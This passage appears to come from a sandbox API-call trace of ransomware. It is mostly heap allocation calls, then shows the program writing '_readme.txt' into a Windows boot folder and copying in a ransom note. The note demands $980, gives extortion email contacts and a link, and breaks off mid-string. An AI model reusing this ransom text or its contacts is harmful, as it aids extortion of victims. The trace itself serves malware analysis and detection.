lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.241] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.245] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.245] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.246] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.246] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2ade6e0 [0184.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.247] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.247] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.248] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.248] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.249] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.249] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.250] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.250] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.251] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.251] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.252] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.253] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.254] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.254] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.257] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.257] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.258] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.258] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.259] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.260] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.260] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0184.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.262] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.263] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.264] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.264] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.265] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.265] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.266] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.266] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.267] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.267] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0184.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0184.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0184.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.268] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.269] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.269] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0184.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0184.270] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0184.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0184.270] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0184.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.270] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.270] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.270] PathFindFileNameW (pszPath="") returned="" [0184.270] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0184.271] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0184.271] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0184.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0184.271] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac3dd0 [0184.271] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0184.271] FreeLibrary (hLibModule=0x759a0000) returned 1 [0184.272] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0184.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0184.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7950 | out: hHeap=0x2c0000) returned 1 [0184.272] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0184.272] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x2ae3ea0 [0184.272] lstrcpyW (in: lpString1=0x2ae3ea0, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.272] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this 